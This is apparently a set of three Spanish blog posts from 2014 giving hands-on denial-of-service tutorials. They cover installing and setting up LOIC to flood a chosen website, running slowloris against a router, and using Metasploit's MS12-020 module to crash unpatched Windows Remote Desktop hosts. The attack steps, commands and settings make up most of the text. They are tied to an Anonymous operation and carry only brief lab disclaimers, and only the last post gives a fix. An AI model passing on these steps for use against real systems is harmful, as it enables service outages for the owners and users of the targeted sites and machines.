lunes, 30 de junio de 2014

DOS con LOIC kali linux


En plena #OpCupBrazil seguimos analizando los programas que usa Anonymous, hoy toca uno de los mas famosos, es LOIC mas orientado al DDOS (Denegación de servicio Dirigida).

LOIC son las siglas de Low Orbit Ion Canon,  que se dio a la fama como un arma cibernetica capaz de disparar a su objetivo y colapsando el trafico del objetivo y capaz de cordinarse por canales IRC con otras permitiendo un ataque conjunto.


-
aptitude install git-core monodevelop


Ahora crearemos una carpeta en el escritorio donde instalaremos loic
cd Desktop Nos movemos al escritorio
mkdir loic creamos una carpeta llamada loic
cd loic
wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh
loic download


chmod 777 loic.sh Elevamos privilegios de loic.sh a rwxrwxrwx.
./loic.sh install 
apt-get install mono-gmcs Instalamos el motor grafico.
./loic.sh run
loic start


Vamos a configurarlo.

Señalamos la opción " Append random chars..." 

URL: Introducimos el sitio web a atacar y presionamos "Lock on".

Method: Usaremos UDP al no tener que tener que establecer una conexión pactada y ser el trafico unidireccional entre ambas maquinas y deberemos de tener cuidado porque mostramos nuestra ip.

Threads: Configuraremos 50 hilos.


loic start


Probaremos el laboratorio en una pagina que hemos preparado para esto.
website up loic


Y un minuto después de empezar a bombardearlo la pagina se queda inoperativa.
website loic down




**Esta práctica no tiene intenciones maliciosas, es un entorno de laboratorio controlado por el administrador, el cual es usado para aprender sobre las tecnologías, concienciar de los peligros de sus usos.

jueves, 26 de junio de 2014

DOS con slowloris


Los ataques DOS (Denial Of Service) sirven para dejar fuera de servicio un equipo o dispositivo, como bien sabéis.

Hoy vamos a realizar una practica en red local, donde queremos colapsar el acceso al router, para eso nos apoyaremos de slowloris, un programa que se ha puesto de moda estas ultimas semanas por ser usado por Anonymous en la #OpCupBrazil

Lo primero sera crear el script: Codigo Slowloris, este codigo lo pegamos en un documento vació y lo guardamos con extension pl (slowloris.pl).

Mi objetivo a tumbar es un router domestico, del que no quiero que nadie pueda acceder, y que esta protegido frente a ataques DOS.


Abrimos una consola, lo primero sera hacer un ping que tenemos conexión hacia el: ping 192.168.1.1

Ahora lanzaremos slowloris:
./slowloris.pl -dns 192.168.1.1 
slowloris DOS router
Ataque a un router con slowloris


Slowloris envia una cantidad de paquetes, entre 450-550 paquetes y duerme minuto y medio, y vuelve a atacar así todo el rato, lo que provoca una denegación de servicio mas eficaz y mas difícil que haga saltar las alarmas.

router down
Router fuera de servicio




**Esta práctica no tiene intenciones maliciosas, es un entorno de laboratorio controlado por el administrador, el cual es usado para aprender sobre las tecnologías, concienciar de los peligros de sus usos y saber actuar frente a estos ataques.

lunes, 2 de junio de 2014

DOS por control remoto



Hoy vamos a practicar con una vulnerabilidad que afecta al control remoto en sistemas Windows, concretamente a las versiones de Windows 7 , 2003 server, 2008 server, 2008 r2 server y XP que no han sido parcheadas.


El escenario consta de 2 maquinas: una es el atacante con Kali Linux de sistema operativo y la otra sera un windows Ultimate limpio sin actualizaciones.


La vulnerabilidad fue catalogada como: MS12-020, solucionando la vulnerabilidad de ejecución remota de código al servidor de Terminal Server, con lanzamiento del parche el 13 de Marzo de 2012.


Para esta vulnerabilidad se necesita tener una opción especifica, que es la de permitir las conexiones desde equipos que ejecuten cualquier versión de Escritorio remoto (menos seguro). La primera no dejara pues esta vulnerabilidad necesita tener habilitado Escritorio remoto y la 3º es identificación a nivel de red con lo que no tendríamos paso al equipo.

escritorio remoto vulnerable
Equipo vulnerable 


Ahora desde nuestro Kali Linux procederemos a atacar:

Lo primero sera poner en marcha metasploit, así que abrimos una consola y escribimos: msfconsole

Para buscar el exploit, haremos: search ms12-020
search ms12-020


Ahora lo cargaremos:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Para ver las opciones que tenemos: show options
Configuramos la maquina de la victima con: set RHOST 192.168.1.X

use exploit metasploit


Y por ultimo lo ponemos a funcionar con exploit o run.

Lo que estamos haciendo es enviar un paquete con unas características concretas a la victima por el puerto 3389 (Por defecto), y luego hace la conexión con lo que provoca que la maquina caiga.

exploit o run


Como vemos la victima sufre la pantalla azul de la muerte, originada por RDPWD.SYS, que es el driver del control remoto.

blue death screen
Blue death screen


Solución a esta vulnerabilidad.
La mejor solución es instalar las actualizaciones que Windows te sugiere, pues muchas de estas son instaladas en los equipos que las tienen actualizadas con lo que el margen que estas inseguro publicamente es bastante reducido.

Tambien se puede arreglar mediante un Fix it, oficial de Microsoft. No pretende ser un sustituto a la actualización pero tapara la vulnerabilidad. 



Happy Hacking!!